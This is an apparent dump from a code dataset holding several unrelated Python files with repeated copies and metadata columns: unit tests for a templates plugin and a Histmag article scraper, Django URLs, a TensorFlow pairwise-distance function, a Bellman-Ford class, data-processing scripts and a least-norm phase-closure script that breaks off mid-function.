test_project.TEST_SETTINGS += """
from modelmanager.plugins import templates
from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict
from modelmanager import utils
@utils.propertyplugin
class params(_TemplatesDict):
template_patterns = ['param.txt']
"""
TEST_TEMPLATES = {'input/test_param.txt': ("Test parameters\n{n:d} {d:f}",
"Test parameters\n 1 1.1 "),
'input/test_config.pr': ("parameters {test}\n{time}\n{n:d}",
"parameters XYZ \n2000-01-01\n1")}
class TestTemplates(test_project.ProjectTestCase):
def setUp(self):
super(TestTemplates, self).setUp()
self.assertTrue(hasattr(self.project, 'templates'))
self.templates = self.project.templates
os.mkdir(os.path.join(self.project.projectdir, 'input'))
os.mkdir(os.path.join(self.templates.resourcedir, 'input'))
for p, (tmplt, tfile) in TEST_TEMPLATES.items():
with open(os.path.join(self.templates.resourcedir, p), 'w') as f:
f.write(tmplt)
with open(os.path.join(self.project.projectdir, p), 'w') as f:
f.write(tfile)
return
def test_get_template(self):
for i in ['param', 'config', 'input/*config*']:
tmplt = self.templates.get_template(i)
self.assertIn(os.path.relpath(tmplt.filepath, self.projectdir),
TEST_TEMPLATES)
self.assertEqual(len(self.templates.get_templates('input/*')), 2)
def test_read_values(self):
self.assertEqual(self.templates('n'), 1)
self.assertEqual(self.templates('d'), 1.1)
self.assertEqual(self.templates('test'), "XYZ")
self.assertRaises(KeyError, self.templates, "unknown")
config = self.templates['config']
# return value only
self.assertEqual(config.read_values('test'), 'XYZ')
# return dict
d = config.read_values('test', 'time')
self.assertEqual(d['time'], '2000-01-01')
self.assertRaises(KeyError, config.read_values, 'unknown')
def test_write_values(self):
self.templates(n=100)
self.assertEqual(self.templates('n'), 100)
self.templates(d=1.111)
self.assertEqual(self.templates('d'), 1.111)
self.templates(test='Somelongstr')
self.assertEqual(self.templates('test'), "Somelongstr")
self.assertRaises(KeyError, self.templates, unknown=1)
param = self.templates['param']
self.assertRaises(KeyError, param.write_values, unknown=1)
def test_subset(self):
self.assertEqual(self.templates('n', templates='config'), 1)
self.templates(n=2, templates=['config'])
self.assertEqual(self.templates('n', templates='param'), 1)
self.assertEqual(self.templates('n', templates='config'), 2)
# value from template listed first is returned
self.assertEqual(self.templates("n", templates=['config', 'param']), 2)
def test_templates_dict(self):
self.assertEqual(self.project.params['n'], 1)
print(self.project.params)
self.project.params['n'] = 3
self.assertEqual(self.templates('n', templates='param'), 3)
if __name__ == '__main__':
cProfile.run('unittest.main()', 'pstats')
# print profile stats ordered by time
pstats.Stats('pstats').strip_dirs().sort_stats('time').print_stats(5)
| """Test module for the Templates plugin."""
import unittest
import os
import cProfile, pstats
import test_project
test_project.TEST_SETTINGS += """
from modelmanager.plugins import templates
from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict
from modelmanager import utils
@utils.propertyplugin
class params(_TemplatesDict):
template_patterns = ['param.txt']
"""
TEST_TEMPLATES = {'input/test_param.txt': ("Test parameters\n{n:d} {d:f}",
"Test parameters\n 1 1.1 "),
'input/test_config.pr': ("parameters {test}\n{time}\n{n:d}",
"parameters XYZ \n2000-01-01\n1")}
class TestTemplates(test_project.ProjectTestCase):
def setUp(self):
super(TestTemplates, self).setUp()
self.assertTrue(hasattr(self.project, 'templates'))
self.templates = self.project.templates
os.mkdir(os.path.join(self.project.projectdir, 'input'))
os.mkdir(os.path.join(self.templates.resourcedir, 'input'))
for p, (tmplt, tfile) in TEST_TEMPLATES.items():
with open(os.path.join(self.templates.resourcedir, p), 'w') as f:
f.write(tmplt)
with open(os.path.join(self.project.projectdir, p), 'w') as f:
f.write(tfile)
return
def test_get_template(self):
for i in ['param', 'config', 'input/*config*']:
tmplt = self.templates.get_template(i)
self.assertIn(os.path.relpath(tmplt.filepath, self.projectdir),
TEST_TEMPLATES)
self.assertEqual(len(self.templates.get_templates('input/*')), 2)
def test_read_values(self):
self.assertEqual(self.templates('n'), 1)
self.assertEqual(self.templates('d'), 1.1)
self.assertEqual(self.templates('test'), "XYZ")
self.assertRaises(KeyError, self.templates, "unknown")
config = self.templates['config']
# return value only
self.assertEqual(config.read_values('test'), 'XYZ')
# return dict
d = config.read_values('test', 'time')
self.assertEqual(d['time'], '2000-01-01')
self.assertRaises(KeyError, config.read_values, 'unknown')
def test_write_values(self):
self.templates(n=100)
self.assertEqual(self.templates('n'), 100)
self.templates(d=1.111)
self.assertEqual(self.templates('d'), 1.111)
self.templates(test='Somelongstr')
self.assertEqual(self.templates('test'), "Somelongstr")
self.assertRaises(KeyError, self.templates, unknown=1)
param = self.templates['param']
self.assertRaises(KeyError, param.write_values, unknown=1)
def test_subset(self):
self.assertEqual(self.templates('n', templates='config'), 1)
self.templates(n=2, templates=['config'])
self.assertEqual(self.templates('n', templates='param'), 1)
self.assertEqual(self.templates('n', templates='config'), 2)
# value from template listed first is returned
self.assertEqual(self.templates("n", templates=['config', 'param']), 2)
def test_templates_dict(self):
self.assertEqual(self.project.params['n'], 1)
print(self.project.params)
self.project.params['n'] = 3
self.assertEqual(self.templates('n', templates='param'), 3)
if __name__ == '__main__':
cProfile.run('unittest.main()', 'pstats')
# print profile stats ordered by time
pstats.Stats('pstats').strip_dirs().sort_stats('time').print_stats(5)
| en | 0.453656 | Test module for the Templates plugin. from modelmanager.plugins import templates from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict from modelmanager import utils @utils.propertyplugin class params(_TemplatesDict): template_patterns = ['param.txt'] # return value only # return dict # value from template listed first is returned # print profile stats ordered by time | 2.699697 | 3 |
mobify/test/test_histmag.py | macbre/mobify | 5 | 6623900 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import print_function
from . import MobifyTestCase
from mobify.sources.histmag import HistmagPage, HistmagSource
class Histmag(MobifyTestCase):
@staticmethod
def test_is_my_url():
assert not HistmagSource.is_my_url('http://example.com')
assert HistmagSource.is_my_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449')
assert HistmagSource.is_my_url(
'https://histmag.org/czy-powstanie-listopadowe-bylo-skazane-na-porazke-13520')
@staticmethod
def test_extend_url():
assert HistmagSource.extend_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
) == 'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
assert HistmagSource.extend_url(
'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
) == 'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
assert HistmagSource.extend_url(
'http://histmag.org/zmarl-prof-janusz-tazbir-13257?newsletter=true'
) == 'http://histmag.org/zmarl-prof-janusz-tazbir-13257'
assert HistmagSource.extend_url(
'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648?ciekawostka'
) == 'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648'
class HistmagBeniowski(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947
self._source = HistmagPage(
url='',
content=self.get_fixture('Maurycy-Beniowski-bunt-na-Kamczatce.html')
)
def test_parsing(self):
assert self._source.get_title() == '<NAME> - bunt na Kamczatce'
assert self._source.get_lead() == u'Po upadku konfederacji barskiej został zesłany na Kamczatkę. Awanturnicza natura nie pozwoliła mu jednak długo zagrzać tam miejsca. Tak <NAME> stanął na czele buntu. Czy wywalczył upragnioną wolność?'
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert '<h1><NAME> - bunt na Kamczatce</h1>' in html
assert '<p><strong>Po upadku konfederacji barskiej' in html
assert u'<p>W październiku 1769 roku Beniowski i Wynbladth uczestniczyć mieli w spisku' in html
assert 'Kamczatka, ilustracja' not in html
assert '<NAME> (1741-1786) (domena publiczna)' not in html
assert u'<h4>Zobacz także:</h4>' not in html
class HistmagChurchill(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Winston-Churchill-lew-Albionu-14521
self._source = HistmagPage(
url='',
content=self.get_fixture('Winston-Churchill-lew-Albionu-14521.html')
)
def test_parsing(self):
assert self._source.get_title() == u'Winston Churchill – lew Albionu'
assert self._source.get_lead() == ''
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert u'<h1>Winston Churchill – lew Albionu</h1>' in html
assert u'<h3>Potomek księcia Marlborough</h3>' in html
assert u'<p><NAME> przyszedł na świat 30 listopada 1874 roku. ' in html
assert u'<h3>Tekst jest fragmentem e-booka <NAME>skiego „Perły imperium brytyjskiego”:</h3>' not in html
| # -*- coding: utf-8 -*-
from __future__ import print_function
from . import MobifyTestCase
from mobify.sources.histmag import HistmagPage, HistmagSource
class Histmag(MobifyTestCase):
@staticmethod
def test_is_my_url():
assert not HistmagSource.is_my_url('http://example.com')
assert HistmagSource.is_my_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449')
assert HistmagSource.is_my_url(
'https://histmag.org/czy-powstanie-listopadowe-bylo-skazane-na-porazke-13520')
@staticmethod
def test_extend_url():
assert HistmagSource.extend_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
) == 'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
assert HistmagSource.extend_url(
'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
) == 'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
assert HistmagSource.extend_url(
'http://histmag.org/zmarl-prof-janusz-tazbir-13257?newsletter=true'
) == 'http://histmag.org/zmarl-prof-janusz-tazbir-13257'
assert HistmagSource.extend_url(
'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648?ciekawostka'
) == 'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648'
class HistmagBeniowski(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947
self._source = HistmagPage(
url='',
content=self.get_fixture('Maurycy-Beniowski-bunt-na-Kamczatce.html')
)
def test_parsing(self):
assert self._source.get_title() == '<NAME> - bunt na Kamczatce'
assert self._source.get_lead() == u'Po upadku konfederacji barskiej został zesłany na Kamczatkę. Awanturnicza natura nie pozwoliła mu jednak długo zagrzać tam miejsca. Tak <NAME> stanął na czele buntu. Czy wywalczył upragnioną wolność?'
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert '<h1><NAME> - bunt na Kamczatce</h1>' in html
assert '<p><strong>Po upadku konfederacji barskiej' in html
assert u'<p>W październiku 1769 roku Beniowski i Wynbladth uczestniczyć mieli w spisku' in html
assert 'Kamczatka, ilustracja' not in html
assert '<NAME> (1741-1786) (domena publiczna)' not in html
assert u'<h4>Zobacz także:</h4>' not in html
class HistmagChurchill(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Winston-Churchill-lew-Albionu-14521
self._source = HistmagPage(
url='',
content=self.get_fixture('Winston-Churchill-lew-Albionu-14521.html')
)
def test_parsing(self):
assert self._source.get_title() == u'Winston Churchill – lew Albionu'
assert self._source.get_lead() == ''
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert u'<h1>Winston Churchill – lew Albionu</h1>' in html
assert u'<h3>Potomek księcia Marlborough</h3>' in html
assert u'<p><NAME> przyszedł na świat 30 listopada 1874 roku. ' in html
assert u'<h3>Tekst jest fragmentem e-booka <NAME>skiego „Perły imperium brytyjskiego”:</h3>' not in html | en | 0.514287 | # -*- coding: utf-8 -*- # @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947 # failed assert will print the raw HTML # @see https://histmag.org/Winston-Churchill-lew-Albionu-14521 # failed assert will print the raw HTML | 2.245521 | 2 |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/service_status/urls.py | osoco/better-ways-of-thinking-about-software | 3 | 6623901 | """
Django URLs for service status app
"""
from django.conf.urls import url
from openedx.core.djangoapps.service_status.views import celery_ping, celery_status, index
urlpatterns = [
url(r'^$', index, name='status.service.index'),
url(r'^celery/$', celery_status, name='status.service.celery.status'),
url(r'^celery/ping/$', celery_ping, name='status.service.celery.ping'),
]
| """
Django URLs for service status app
"""
from django.conf.urls import url
from openedx.core.djangoapps.service_status.views import celery_ping, celery_status, index
urlpatterns = [
url(r'^$', index, name='status.service.index'),
url(r'^celery/$', celery_status, name='status.service.celery.status'),
url(r'^celery/ping/$', celery_ping, name='status.service.celery.ping'),
]
| en | 0.628141 | Django URLs for service status app | 1.802629 | 2 |
glomtf/pairwisedist.py | Rishit-dagli/GLOM-TensorFlow | 31 | 6623902 | import tensorflow as tf
def pairwise_dist(A, B):
"""Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors.
We use the euclidean distance metric.
For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of
pairwise distances here D [m, n]
# Arguments:
A: A tf.Tensor object. The first matrix.
B: A tf.tensor object. The second matrix.
# Returns:
Calculate distance.
# Reference:
[scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
[tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659)
"""
# squared norms of each row in A and B
na = tf.reduce_sum(tf.square(A), 1)
nb = tf.reduce_sum(tf.square(B), 1)
# na as a row and nb as a column vectors
na = tf.reshape(na, [-1, 1])
nb = tf.reshape(nb, [1, -1])
# return pairwise euclidean difference matrix
D = tf.sqrt(tf.maximum(na - 2 * tf.matmul(A, B, False, True) + nb, 0.0))
return D
| import tensorflow as tf
def pairwise_dist(A, B):
"""Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors.
We use the euclidean distance metric.
For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of
pairwise distances here D [m, n]
# Arguments:
A: A tf.Tensor object. The first matrix.
B: A tf.tensor object. The second matrix.
# Returns:
Calculate distance.
# Reference:
[scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
[tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659)
"""
# squared norms of each row in A and B
na = tf.reduce_sum(tf.square(A), 1)
nb = tf.reduce_sum(tf.square(B), 1)
# na as a row and nb as a column vectors
na = tf.reshape(na, [-1, 1])
nb = tf.reshape(nb, [1, -1])
# return pairwise euclidean difference matrix
D = tf.sqrt(tf.maximum(na - 2 * tf.matmul(A, B, False, True) + nb, 0.0))
return D
| en | 0.769396 | Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors. We use the euclidean distance metric. For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of pairwise distances here D [m, n] # Arguments: A: A tf.Tensor object. The first matrix. B: A tf.tensor object. The second matrix. # Returns: Calculate distance. # Reference: [scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html) [tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659) # squared norms of each row in A and B # na as a row and nb as a column vectors # return pairwise euclidean difference matrix | 3.562602 | 4 |
tests/test_search.py | dhinakg/BitSTAR | 6 | 6623903 | <filename>tests/test_search.py
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from api import message, plugin
from plugins import search
class TestSearchSuite(unittest.TestCase):
def test_search_empty_msg(self):
msg = message.Message(body="")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, 'I need a topic to search for!')
def test_search_google(self):
msg = message.Message(body="hello world")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
print(result)
self.assertEqual(result.body, 'Google search: https://www.google.com/#q=hello%20world')
def test_search_duck_duck_go(self):
msg = message.Message(body="hello world")
msg.command = "duckduckgo"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "DuckDuckGo search: https://www.duckduckgo.com/?q=hello%20world")
def test_search_bing(self):
msg = message.Message(body="hello world")
msg.command = "bing"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "Bing search: https://www.bing.com/?q=hello%20world")
| <filename>tests/test_search.py
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from api import message, plugin
from plugins import search
class TestSearchSuite(unittest.TestCase):
def test_search_empty_msg(self):
msg = message.Message(body="")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, 'I need a topic to search for!')
def test_search_google(self):
msg = message.Message(body="hello world")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
print(result)
self.assertEqual(result.body, 'Google search: https://www.google.com/#q=hello%20world')
def test_search_duck_duck_go(self):
msg = message.Message(body="hello world")
msg.command = "duckduckgo"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "DuckDuckGo search: https://www.duckduckgo.com/?q=hello%20world")
def test_search_bing(self):
msg = message.Message(body="hello world")
msg.command = "bing"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "Bing search: https://www.bing.com/?q=hello%20world")
| en | 0.827401 | # Copyright 2017 Starbot Discord Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #q=hello%20world') | 2.917053 | 3 |
exploration/scripts/nbconverted/latent_offset_bool.py | greenelab/Pseudomonas_latent_spaces | 0 | 6623904 |
# coding: utf-8
# In[1]:
#-------------------------------------------------------------------------------------------------------------------------------
# By <NAME> (July 2018)
#
# Take the average of the encoded gene expression for the two experimental conditions
# Take the difference of the averages -- this will be the offset for the latent space
#-------------------------------------------------------------------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
randomState = 123
from numpy.random import seed
seed(randomState)
# In[2]:
# load arguments
encodedA_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_treat_2layer_10latent_encoded.txt")
encodedB_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_control_2layer_10latent_encoded.txt")
# output files
out_file = os.path.join(os.path.dirname(os.getcwd()), "data", "cipro_treatment", "train_offset_2layer_10latent.txt")
# In[3]:
# read in data
encodedA_data = pd.read_table(encodedA_file, header=0, sep='\t', index_col=0)
encodedB_data = pd.read_table(encodedB_file, header=0, sep='\t', index_col=0)
encodedA_data.head(5)
# In[4]:
# Average gene expression across samples in training set
train_A_mean = encodedA_data.mean(axis=0)
train_B_mean = encodedB_data.mean(axis=0)
train_A_mean
# In[5]:
train_B_mean
# In[6]:
# Generate offset using average gene expression in original dataset
train_offset_latent = train_A_mean - train_B_mean
train_offset_latent_df = pd.Series.to_frame(train_offset_latent).transpose()
train_offset_latent_df
# In[7]:
# output
train_offset_latent_df.to_csv(out_file, sep='\t')
|
# coding: utf-8
# In[1]:
#-------------------------------------------------------------------------------------------------------------------------------
# By <NAME> (July 2018)
#
# Take the average of the encoded gene expression for the two experimental conditions
# Take the difference of the averages -- this will be the offset for the latent space
#-------------------------------------------------------------------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
randomState = 123
from numpy.random import seed
seed(randomState)
# In[2]:
# load arguments
encodedA_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_treat_2layer_10latent_encoded.txt")
encodedB_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_control_2layer_10latent_encoded.txt")
# output files
out_file = os.path.join(os.path.dirname(os.getcwd()), "data", "cipro_treatment", "train_offset_2layer_10latent.txt")
# In[3]:
# read in data
encodedA_data = pd.read_table(encodedA_file, header=0, sep='\t', index_col=0)
encodedB_data = pd.read_table(encodedB_file, header=0, sep='\t', index_col=0)
encodedA_data.head(5)
# In[4]:
# Average gene expression across samples in training set
train_A_mean = encodedA_data.mean(axis=0)
train_B_mean = encodedB_data.mean(axis=0)
train_A_mean
# In[5]:
train_B_mean
# In[6]:
# Generate offset using average gene expression in original dataset
train_offset_latent = train_A_mean - train_B_mean
train_offset_latent_df = pd.Series.to_frame(train_offset_latent).transpose()
train_offset_latent_df
# In[7]:
# output
train_offset_latent_df.to_csv(out_file, sep='\t')
| en | 0.449494 | # coding: utf-8 # In[1]: #------------------------------------------------------------------------------------------------------------------------------- # By <NAME> (July 2018) # # Take the average of the encoded gene expression for the two experimental conditions # Take the difference of the averages -- this will be the offset for the latent space #------------------------------------------------------------------------------------------------------------------------------- # In[2]: # load arguments # output files # In[3]: # read in data # In[4]: # Average gene expression across samples in training set # In[5]: # In[6]: # Generate offset using average gene expression in original dataset # In[7]: # output | 2.312145 | 2 |
public-engines/kaggle-titanic-engine/marvin_titanic_engine/data_handler/acquisitor_and_cleaner.py | tallandroid/incubator-marvin | 101 | 6623905 | #!/usr/bin/env python
# coding=utf-8
"""AcquisitorAndCleaner engine action.
Use this module to add the project main code.
"""
import pandas as pd
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.common.data import MarvinData
import pandas as pd
from marvin_python_toolbox.engine_base import EngineBaseDataHandler
__all__ = ['AcquisitorAndCleaner']
logger = get_logger('acquisitor_and_cleaner')
class AcquisitorAndCleaner(EngineBaseDataHandler):
def __init__(self, **kwargs):
super(AcquisitorAndCleaner, self).__init__(**kwargs)
def execute(self, params, **kwargs):
train_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/train.csv"))
test_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/test.csv"))
print ("{} samples to train with {} features...".format(train_df.shape[0], train_df.shape[1]))
print ("{} samples to test...".format(test_df.shape[0]))
self.marvin_initial_dataset = {
'train': train_df,
'test': test_df
}
| #!/usr/bin/env python
# coding=utf-8
"""AcquisitorAndCleaner engine action.
Use this module to add the project main code.
"""
import pandas as pd
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.common.data import MarvinData
import pandas as pd
from marvin_python_toolbox.engine_base import EngineBaseDataHandler
__all__ = ['AcquisitorAndCleaner']
logger = get_logger('acquisitor_and_cleaner')
class AcquisitorAndCleaner(EngineBaseDataHandler):
def __init__(self, **kwargs):
super(AcquisitorAndCleaner, self).__init__(**kwargs)
def execute(self, params, **kwargs):
train_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/train.csv"))
test_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/test.csv"))
print ("{} samples to train with {} features...".format(train_df.shape[0], train_df.shape[1]))
print ("{} samples to test...".format(test_df.shape[0]))
self.marvin_initial_dataset = {
'train': train_df,
'test': test_df
}
| en | 0.416394 | #!/usr/bin/env python # coding=utf-8 AcquisitorAndCleaner engine action. Use this module to add the project main code. | 2.490592 | 2 |
ads/graphs_processing/clrs/bellman_ford.py | Aminul-Momin/Algorithms_and_Data_Structures | 0 | 6623906 | <filename>ads/graphs_processing/clrs/bellman_ford.py
from ads.errors.exceptions import NegativeWeightCycleException
from .graphs import Digraph, DGVertex
class BellmanFord(object):
"""
The class represents a data type for detecting the negative-weight cycle for
single-source shortest paths problem in edge-weighted digraphs.
It returns True if no negative-weight cycle if detected or False if a negative
cycle reachable from the source vertex.
NOTE: The edge weights can be positive, negative, or zero.
"""
def __init__(self, G: Digraph, source: DGVertex):
self._bellman_ford(G, source)
def _bellman_ford(self, G: Digraph, source: DGVertex) -> bool:
"""Check whether the given digraph has negative-weight cycle or not.
Args:
G (Digraph): A directed graph.
source (DGVertex): a special vertex for directed graph.
Returns:
bool: True if no negative-weight cycle reachable from source,
False otherwise.
"""
source.distance = 0
for _ in range(G.V() - 1):
for u in G:
for v in u.neighbors():
self.relax(u, v)
# Check for negative-weight cycles
for u in G:
for v in u.neighbors():
if v.distance > u.distance + u.adj[v]:
return False
return True
def relax(self, u, v):
"""Relax the edge between u and v and update distance of v.
Args:
u: a vertex, predecessor of v
v: a vertex, decendent of u
"""
# Shortest distane so far: ∂(s, v) = distance[u] + u_v_weight
if v.distance > u.distance + u.adj[v]:
v.distance = u.distance + u.adj[v]
v.parent = u
| <filename>ads/graphs_processing/clrs/bellman_ford.py
from ads.errors.exceptions import NegativeWeightCycleException
from .graphs import Digraph, DGVertex
class BellmanFord(object):
"""
The class represents a data type for detecting the negative-weight cycle for
single-source shortest paths problem in edge-weighted digraphs.
It returns True if no negative-weight cycle if detected or False if a negative
cycle reachable from the source vertex.
NOTE: The edge weights can be positive, negative, or zero.
"""
def __init__(self, G: Digraph, source: DGVertex):
self._bellman_ford(G, source)
def _bellman_ford(self, G: Digraph, source: DGVertex) -> bool:
"""Check whether the given digraph has negative-weight cycle or not.
Args:
G (Digraph): A directed graph.
source (DGVertex): a special vertex for directed graph.
Returns:
bool: True if no negative-weight cycle reachable from source,
False otherwise.
"""
source.distance = 0
for _ in range(G.V() - 1):
for u in G:
for v in u.neighbors():
self.relax(u, v)
# Check for negative-weight cycles
for u in G:
for v in u.neighbors():
if v.distance > u.distance + u.adj[v]:
return False
return True
def relax(self, u, v):
"""Relax the edge between u and v and update distance of v.
Args:
u: a vertex, predecessor of v
v: a vertex, decendent of u
"""
# Shortest distane so far: ∂(s, v) = distance[u] + u_v_weight
if v.distance > u.distance + u.adj[v]:
v.distance = u.distance + u.adj[v]
v.parent = u
| en | 0.77365 | The class represents a data type for detecting the negative-weight cycle for single-source shortest paths problem in edge-weighted digraphs. It returns True if no negative-weight cycle if detected or False if a negative cycle reachable from the source vertex. NOTE: The edge weights can be positive, negative, or zero. Check whether the given digraph has negative-weight cycle or not. Args: G (Digraph): A directed graph. source (DGVertex): a special vertex for directed graph. Returns: bool: True if no negative-weight cycle reachable from source, False otherwise. # Check for negative-weight cycles Relax the edge between u and v and update distance of v. Args: u: a vertex, predecessor of v v: a vertex, decendent of u # Shortest distane so far: ∂(s, v) = distance[u] + u_v_weight | 2.937049 | 3 |
coman/_version.py | wietsedv/poco | 1 | 6623907 | from pkg_resources import get_distribution
__version__ = get_distribution("coman").version
| from pkg_resources import get_distribution
__version__ = get_distribution("coman").version
| none | 1 | 1.263042 | 1 | |
companies/tests.py | buketkonuk/pythondotorg | 911 | 6623908 | <filename>companies/tests.py
from django.test import TestCase
from . import admin # coverage FTW
from .templatetags.companies import render_email
class CompaniesTagsTests(TestCase):
def test_render_email(self):
self.assertEqual(render_email(''), None)
self.assertEqual(render_email('<EMAIL>'), 'firstname<span>.</span>lastname<span>@</span>domain<span>.</span>com')
| <filename>companies/tests.py
from django.test import TestCase
from . import admin # coverage FTW
from .templatetags.companies import render_email
class CompaniesTagsTests(TestCase):
def test_render_email(self):
self.assertEqual(render_email(''), None)
self.assertEqual(render_email('<EMAIL>'), 'firstname<span>.</span>lastname<span>@</span>domain<span>.</span>com')
| en | 0.985351 | # coverage FTW | 2.148752 | 2 |
applications/least_norm.py | rbiessel/CovSAR | 1 | 6623909 | import numpy as np
from matplotlib import pyplot as plt
def least_norm(A, closures, pinv=False):
'''
Solve: Ax = b
Find the minimum norm vector 'x' of phases that can explain 'b' phase closures
'''
if pinv:
return np.linalg.pinv(A) @ closures
return A.T @ np.linalg.inv(A @ A.T) @ closures
def get_closures(A, phi):
'''
Use matrix mult to generate vector of phase closures such that
the angle xi = phi_12 + phi_23 - phi_13
'''
return A @ np.angle(phi)
# Vector of phases with zero phase closure errors
closed = np.exp(1j * np.array([0.5, 1, 0.5]))
# Vector of phases with non-zero closure errors
unclosed = np.exp(1j * np.array([0.5, 1 + 0.1, 0.5 + 0.1]))
def main(phis):
ind = np.array([1, 2, 3])
A = np.array([[1, -1, 1]])
# Phases to phase closures
closures = get_closures(A, phis)
# Phase closures back to phases
least_norm_phi = least_norm(A, closures)
print('Phase closures: ', closures)
plt.plot(ind, np.angle(closed), label='observed phases')
plt.plot(ind, np.angle(least_norm_phi), label='least norm phases ')
plt.plot(ind, np.angle(closed * least_norm_phi.conj()),
label='Corrected Phases')
plt.legend(loc='lower left')
plt.show()
main(unclosed)
| import numpy as np
from matplotlib import pyplot as plt
def least_norm(A, closures, pinv=False):
'''
Solve: Ax = b
Find the minimum norm vector 'x' of phases that can explain 'b' phase closures
'''
if pinv:
return np.linalg.pinv(A) @ closures
